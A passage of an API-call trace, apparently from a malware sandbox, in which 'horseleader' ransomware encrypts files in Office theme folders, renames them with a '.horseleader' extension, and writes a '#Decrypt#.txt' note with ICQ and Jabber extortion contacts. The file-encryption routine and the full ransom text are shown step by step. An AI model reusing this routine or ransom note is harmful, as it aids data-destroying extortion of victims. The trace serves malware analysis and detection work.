[0247.998] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.998] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\sonora.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.000] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.ELM") returned 77 [0248.000] StrStrW (lpFirst="SONORA.ELM", lpSrch=".txt") returned 0x0 [0248.000] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=54687) returned 1 [0248.000] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.002] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.002] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.004] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.004] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.005] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, 
nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.005] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x359f, lpOverlapped=0x0) returned 1 [0248.005] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffca61, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.005] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x359f, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x359f, lpOverlapped=0x0) returned 1 [0248.005] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.005] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.005] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.006] CloseHandle (hObject=0x1a4) returned 1 [0248.006] GetProcessHeap () returned 0x780000 [0248.006] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.006] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.ELM.horseleader") returned 89 [0248.006] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.ELM" (normalized: "c:\\program files\\common 
files\\microsoft shared\\themes14\\sonora\\sonora.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\sonora.elm.horseleader")) returned 1 [0248.009] GetProcessHeap () returned 0x780000 [0248.009] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.009] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5aad71f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1e4, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="SONORA.INF", cAlternateFileName="")) returned 1 [0248.009] lstrcmpiW (lpString1="SONORA.INF", lpString2="Windows") returned -1 [0248.009] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.INF") returned 77 [0248.009] StrStrIW (lpFirst="SONORA.INF", lpSrch=".horseleader") returned 0x0 [0248.009] lstrcmpW (lpString1="SONORA.INF", lpString2="#Decrypt#.txt") returned 1 [0248.009] lstrcmpW (lpString1="SONORA.INF", lpString2="_uninstalling_.png") returned 1 [0248.009] lstrlenW (lpString=".testttjffg") returned 11 [0248.009] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.INF", lpSrch=".testttjffg") returned 0x0 [0248.009] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.009] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, 
pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.009] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\sonora.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.010] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.INF") returned 77 [0248.010] StrStrW (lpFirst="SONORA.INF", lpSrch=".txt") returned 0x0 [0248.010] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=484) returned 1 [0248.010] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1e4, lpOverlapped=0x0) returned 1 [0248.011] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe1c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.012] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1e4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1e4, lpOverlapped=0x0) returned 1 [0248.012] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.012] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.012] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.012] 
CloseHandle (hObject=0x1a4) returned 1 [0248.012] GetProcessHeap () returned 0x780000 [0248.012] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.012] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.INF.horseleader") returned 89 [0248.012] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\sonora.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\sonora.inf.horseleader")) returned 1 [0248.014] GetProcessHeap () returned 0x780000 [0248.014] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.014] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x5534, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0248.014] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0248.014] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 79 [0248.014] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0248.014] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0248.014] lstrcmpW 
(lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0248.014] lstrlenW (lpString=".testttjffg") returned 11 [0248.014] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0248.014] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.014] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.014] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.015] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 79 [0248.015] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0248.015] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=21812) returned 1 [0248.015] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.018] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.018] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.019] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, 
nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x534, lpOverlapped=0x0) returned 1 [0248.019] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffacc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.019] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x534, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x534, lpOverlapped=0x0) returned 1 [0248.019] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.019] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.019] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.020] CloseHandle (hObject=0x1a4) returned 1 [0248.020] GetProcessHeap () returned 0x780000 [0248.020] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.020] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG.horseleader") returned 91 [0248.020] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft 
shared\\themes14\\sonora\\thmbnail.png.horseleader")) returned 1 [0248.021] GetProcessHeap () returned 0x780000 [0248.021] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.021] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x5534, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0248.021] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0248.021] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\#Decrypt#.txt") returned 80 [0248.021] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.022] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0248.022] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0248.023] lstrlenA (lpString="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") returned 1368 [0248.023] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0248.023] CloseHandle (hObject=0x158) returned 1 [0248.023] GetProcessHeap () returned 0x780000 [0248.023] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0248.023] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="SPRING", cAlternateFileName="")) returned 1 [0248.023] lstrcmpiW (lpString1="SPRING", lpString2="Windows") returned -1 [0248.023] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING") returned 66 [0248.023] lstrcmpW (lpString1="SPRING", lpString2=".") returned 1 [0248.023] lstrcmpW (lpString1="SPRING", lpString2="..") returned 1 [0248.024] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0248.024] GetProcessHeap () returned 0x780000 [0248.024] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0248.024] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\*") returned 68 [0248.024] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0248.024] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0248.024] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\.") returned 68 [0248.024] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0248.024] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0248.024] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0248.024] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\..") returned 69 [0248.024] lstrcmpW (lpString1="..", lpString2=".") returned 1 
[0248.024] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0248.024] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a71ef90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x9df, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0248.024] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0248.025] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 78 [0248.025] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0248.025] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0248.025] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0248.025] lstrlenW (lpString=".testttjffg") returned 11 [0248.025] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0248.025] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.025] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.025] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x1a4 [0248.026] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 78 [0248.026] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0248.026] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=2527) returned 1 [0248.026] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x9df, lpOverlapped=0x0) returned 1 [0248.028] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff621, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.028] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x9df, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x9df, lpOverlapped=0x0) returned 1 [0248.028] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.028] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.029] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.029] CloseHandle (hObject=0x1a4) returned 1 [0248.029] GetProcessHeap () returned 0x780000 [0248.029] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.029] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF.horseleader") returned 90 
